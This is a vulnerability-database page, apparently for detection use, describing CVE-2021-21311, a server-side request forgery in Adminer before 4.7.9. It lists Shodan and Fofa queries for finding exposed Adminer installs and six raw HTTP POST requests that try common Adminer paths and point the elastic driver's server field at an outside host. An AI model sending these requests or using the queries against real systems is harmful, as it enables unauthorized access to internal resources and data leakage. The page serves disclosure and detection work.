🔙 목록으로 돌아가기

CVE-2021-21311: Adminer <4.7.9 - Server-Side Request Forgery

TitleAdminer <4.7.9 - Server-Side Request Forgery
AuthorAdam Crosser,pwnhxl
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.
RemediationUpgrade to version 4.7.9 or later.
CVSS Score7.2
EPSS Score0.93872
CVE IDCVE-2021-21311
CWE IDCWE-918
Shodan Querytitle:"Login - Adminer"cpe:"cpe:2.3:a:adminer:adminer"http.title:"login - adminer"
Fofa Queryapp="Adminer" && body="4.7.8"title="login - adminer"app="adminer" && body="4.7.8"
Tags cve2021 cve adminer ssrf vkev kev vuln

🔍 Vulnerability Description

Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

POST /adminer.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.14
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

auth[driver]=elastic&auth[server]=example.org&auth[username]=1nrrflcs&auth[password]=q2rtkqnd&auth[db]=7bq63xfr
POST /index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/140.0.2 (x64 de)
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

auth[driver]=elastic&auth[server]=example.org&auth[username]=8rqsjfiq&auth[password]=wcdtut5s&auth[db]=k26csjrq
POST /adminer/adminer.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

auth[driver]=elastic&auth[server]=example.org&auth[username]=vodiescv&auth[password]=ksl1fcla&auth[db]=ug1hrxkp
POST /adminer/index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

auth[driver]=elastic&auth[server]=example.org&auth[username]=q9kkui5c&auth[password]=yzaep2ce&auth[db]=k0cbewk8
POST /_adminer/index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

auth[driver]=elastic&auth[server]=example.org&auth[username]=imkddgei&auth[password]=9goksnnr&auth[db]=q5cngp8f
POST /_adminer.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Content-Length: 111
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

auth[driver]=elastic&auth[server]=example.org&auth[username]=tziqnvut&auth[password]=a3k33aui&auth[db]=iqpb8egs

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-21311.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A